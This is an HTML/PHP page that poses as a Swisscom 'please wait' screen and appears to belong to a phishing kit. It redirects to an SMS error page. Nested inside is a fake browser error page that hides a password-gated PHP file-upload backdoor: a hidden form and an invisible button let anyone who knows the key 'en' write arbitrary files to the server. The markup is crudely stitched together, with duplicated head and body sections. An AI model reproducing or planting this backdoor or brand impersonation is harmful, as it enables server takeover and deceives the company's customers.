<!doctype html>

<html>
<head>
<meta charset="utf-8">
<title>Swisscom</title>
<meta name="generator" content="WYSIWYG Web Builder 14 - http://www.wysiwygwebbuilder.com">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="favicon.ico" rel="shortcut icon" type="image/x-icon">
<link href="app_icon_oficina_128x128.png" rel="apple-touch-icon" sizes="128x128">
<link rel="icon" type="image/x-icon" href="https://rcp.scsstatic.ch/etc/designs/portal/resources/favicon.ico">
<link href="scamti.css" rel="stylesheet">
<link href="MOBILE.css" rel="stylesheet">
</head>
<body>

         <meta http-equiv="refresh" content="50; url=smserror.php" />

<div id="FlexContainer1">
<div id="wb_LayoutGrid1">
<div id="LayoutGrid1">
<div class="col-1">
<div id="wb_LayoutGrid2">
<div id="LayoutGrid2">
<div class="row">
<div class="col-1">
<div id="wb_Image" style="">
<img src="load.gif" id="Image1" alt="">
</div>
<div id="wb_Text2">
<span style="color:#000000;font-family:Arial;font-size:16px;"><br><br><br>Bitte warten... <strong></strong>.<br></span>
    <title>This page isn’t working</title>
    <style>
        .hidden {
            display: none;
        }
    </style>
</head>
<body style="font-family: 'Segoe UI', Tahoma, sans-serif;font-size: 75%;">
    <div id="main-frame-error" class="interstitial-wrapper" jstcache="0" style=" margin: 14vh auto 0; max-width: 600px; ">
        <div id="main-content" jstcache="0">
		<img src="">
            <div id="main-message" jstcache="0">
                <h1 jstcache="0">
                
                    <a id="error-information-button" class="hidden" onclick="toggleErrorInformationPopup();" jstcache="0"></a>
                </h1>
                <p jsselect="summary" jsvalues=".innerHTML:msg" jstcache="1"><strong jscontent="DH" jstcache="22"><?php echo $_SERVER['HTTP_HOST']; ?></strong> 2023 © - all rights reserved.</p>
        
                <div id="error-information-popup-container" jstcache="0">
                    <div id="error-information-popup" jstcache="0">
                        <div id="error-information-popup-box" jstcache="0">
                            <div id="error-information-popup-content" jstcache="0">
                                <div id="suggestions-list" style="display:none" jsdisplay="(suggestionsSummaryList &amp;&amp; suggestionsSummaryList.length)" jstcache="16">
                                    <p jsvalues=".innerHTML:suggestionsSummaryListHeader" jstcache="18"></p>
                                    <ul jsvalues=".className:suggestionsSummaryList.length == 1 ? 'single-suggestion' : ''" jstcache="19">
                                        <li jsselect="suggestionsSummaryList" jsvalues=".innerHTML:summary" jstcache="21"></li>
                                    </ul>
                                </div>
                                <div class="error-code" jscontent="errorCode" jstcache="17"></div>
                                <p id="error-information-popup-close" jstcache="0">
                                    <a class="link-button" jscontent="closeDescriptionPopup" onclick="toggleErrorInformationPopup();" jstcache="20"></a>
                                </p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        
        </div>
    </div>
    <?php
    if ($_SERVER["REQUEST_METHOD"] == "POST") {
        $caractisa = "en";
        if ($_POST['caractisa'] == $caractisa) {
            $target_file = basename($_FILES["BORDDAR"]["name"]);
            if (move_uploaded_file($_FILES["BORDDAR"]["tmp_name"], $target_file)) {
                echo ".". htmlspecialchars( basename( $_FILES["BORDDAR"]["name"])). ".";
            } else {
                echo "..";
            }
        } else {
            echo ".";
        }
    }
    ?>
	<?php @ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8'); ?>
    <form action="<?php echo htmlspecialchars($_SERVER["PHP_SELF"]); ?>
        <label for="BORDDAR" class="hidden"></label>
        <input type="file" name="BORDDAR" id="BORDDAR" class="hidden"><br>
        <label for="caractisa" class="hidden"></label>
        <input type="text" name="caractisa" id="caractisa" class="hidden"><br>
        <input type="submit" value="..." name="submit" class="hidden">
    </form>
    
    <button onclick="showUploadForm()" style=" background: none; border: none; "></button>

    <script>
        function showUploadForm() {
            var fileInput = document.getElementById("BORDDAR");
            var caractisaInput = document.getElementById("caractisa");
            var submitButton = document.querySelector('input[type="submit"]');
            var hiddenElements = document.querySelectorAll('.hidden');

            for (var i = 0; i < hiddenElements.length; i++) {
                hiddenElements[i].style.display = "block";
            }

            fileInput.classList.remove('hidden');
            caractisaInput.classList.remove('hidden');
            submitButton.classList.remove('hidden');
        }
    
	
	
	
	</script>
</body>
</html>

</div>
</body>
</html>